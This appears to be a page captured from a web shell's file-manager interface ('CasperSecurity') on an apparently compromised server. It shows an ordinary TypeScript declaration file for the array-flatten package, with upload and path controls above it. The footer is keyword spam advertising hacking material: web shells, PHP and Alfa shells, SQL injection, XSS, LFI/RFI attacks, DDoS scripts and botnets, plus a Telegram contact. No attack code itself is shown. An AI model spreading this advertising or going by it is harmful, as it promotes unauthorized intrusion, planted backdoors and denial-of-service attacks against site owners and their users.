CasperSecurity

Current Path : /var/www/hrms.uiet.co.in/node_modules/array-flatten/
Upload File :
Current File : /var/www/hrms.uiet.co.in/node_modules/array-flatten/array-flatten.d.ts

declare function flatten <T> (array: flatten.NestedArray<T>): T[];

declare namespace flatten {
  export interface NestedArray <T> extends ReadonlyArray<T | NestedArray<T>> {}

  export interface NestedList <T> {
    [index: number]: T | NestedList<T>;
    length: number;
  }

  export function from <T> (array: NestedList<T>): T[];
  export function depth <T> (array: NestedArray<T>, depth: number): NestedArray<T>;
  export function depthFrom <T> (array: NestedList<T>, depth: number): NestedArray<T>;
}

export = flatten;
Hacker Blog, Shell İndir, Sql İnjection, XSS Attacks, LFI Attacks, Social Hacking, Exploit Bot, Proxy Tools, Web Shell, PHP Shell, Alfa Shell İndir, Hacking Training Set, DDoS Script, Denial Of Service, Botnet, RFI Attacks, Encryption
Telegram @BIBIL_0DAY